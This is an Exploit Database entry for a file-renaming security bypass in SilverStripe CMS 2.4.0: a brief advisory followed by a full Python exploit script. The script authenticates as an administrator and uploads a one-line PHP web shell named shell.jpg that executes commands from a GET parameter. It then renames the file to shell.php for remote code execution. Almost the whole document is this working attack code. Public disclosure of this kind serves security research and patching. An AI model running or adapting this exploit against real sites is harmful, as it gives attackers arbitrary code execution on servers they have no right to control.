SilverStripe CMS 2.4 – File Renaming Security Bypass

• Exploit Database
• 11 阅读

• 作者： John Leitch
  日期： 2010-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34113/

• source: https://www.securityfocus.com/bid/40679/info
  
  SilverStripe CMS is prone to a security-bypass vulnerability.
  
  An attacker can exploit this vulnerability to rename uploaded files on the affected webserver. Successful exploits may allow attackers to execute arbitrary code within the context of the affected webserver.
  
  SilverStripe CMS 2.4.0 is vulnerable; other versions may also be affected. 
  
  import sys, socket, re
  host = 'www.example.com'
  path = '/silverstripe'
  username = 'admin'
  password = 'Password1'
  port = 80
  
  def send_request(request):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(8)
  
  s.send(request)
  
  resp = ''
  
  while 1:
  r = s.recv(8192)
  if not r: break
  resp += r
  if r[:15] == 'HTTP/1.1 302 OK': break
  
  s.close()
  
  return resp
  
  def upload_shell():
  print 'authenticating'
  
  content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'
  
  header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
   'Host: ' + host + '\r\n'\
   'Connection: keep-alive\r\n'\
   'User-Agent: x\r\n'\
   'Content-Length: ' + str(len(content)) + '\r\n'\
   'Cache-Control: max-age=0\r\n'\
   'Origin: http://' + host + '\r\n'\
   'Content-Type: application/x-www-form-urlencoded\r\n'\
   'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
   'Accept-Encoding: gzip,deflate,sdch\r\n'\
   'Accept-Language: en-US,en;q=0.8\r\n'\
   'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
   '\r\n'
  
  resp = send_request(header + content)
  
  print 'uploading shell'
  
  match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)
  
  for m in match:
  if m[:9] == 'PHPSESSID':
  cookie = m
  
  content = '------x\r\n'\
  'Content-Disposition: form-data; name="ID"\r\n'\
  '\r\n'\
  '0\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="FolderID"\r\n'\
  '\r\n'\
  '0\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="action_doUpload"\r\n'\
  '\r\n'\
  '1\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
  '\r\n'\
  '\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
  'Content-Type: image/jpeg\r\n'\
  '\r\n'\
  '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
  '\r\n'\
  '\r\n'\
  '------x\r\n'\
  'Content-Disposition: form-data; name="action_upload"\r\n'\
  '\r\n'\
  'Upload Files Listed Below\r\n'\
  '------x--\r\n'\
  
  header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
   'Host: ' + host + '\r\n'\
   'Proxy-Connection: keep-alive\r\n'\
   'User-Agent: x\r\n'\
   'Content-Length: ' + str(len(content)) + '\r\n'\
   'Cache-Control: max-age=0\r\n'\
   'Origin: http://' + host + '\r\n'\
   'Content-Type: multipart/form-data; boundary=----x\r\n'\
   'Accept: text/html\r\n'\
   'Accept-Encoding: gzip,deflate,sdch\r\n'\
   'Accept-Language: en-US,en;q=0.8\r\n'\
   'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
   'Cookie: ' + cookie + '\r\n'\
   '\r\n'
  
  resp = send_request(header + content)
  
  print 'grabbing ids'
  
  file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
  file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)
  
  resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
  'Host: ' + host + '\r\n'\
  'Cookie: ' + cookie + '\r\n\r\n')
  
  print 'renaming shell'
  
  security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
  owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)
  
  content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'
  
  header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
   'Host: ' + host + '\r\n'\
   'Proxy-Connection: keep-alive\r\n'\
   'User-Agent: x\r\n'\
   'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
   'Content-Length: ' + str(len(content)) + '\r\n'\
   'Cache-Control: max-age=0\r\n'\
   'Origin: http://' + host + '\r\n'\
   'Content-Type: application/x-www-form-urlencoded\r\n'\
   'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
   'Accept-Encoding: gzip,deflate,sdch\r\n'\
   'Accept-Language: en-US,en;q=0.8\r\n'\
   'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
   'Cookie: ' + cookie + '; PastMember=1\r\n'\
   '\r\n'
  
  resp = send_request(header + content) 
  
  print 'shell located at http://' + host + path + '/assets/shell.php'
  
  upload_shell()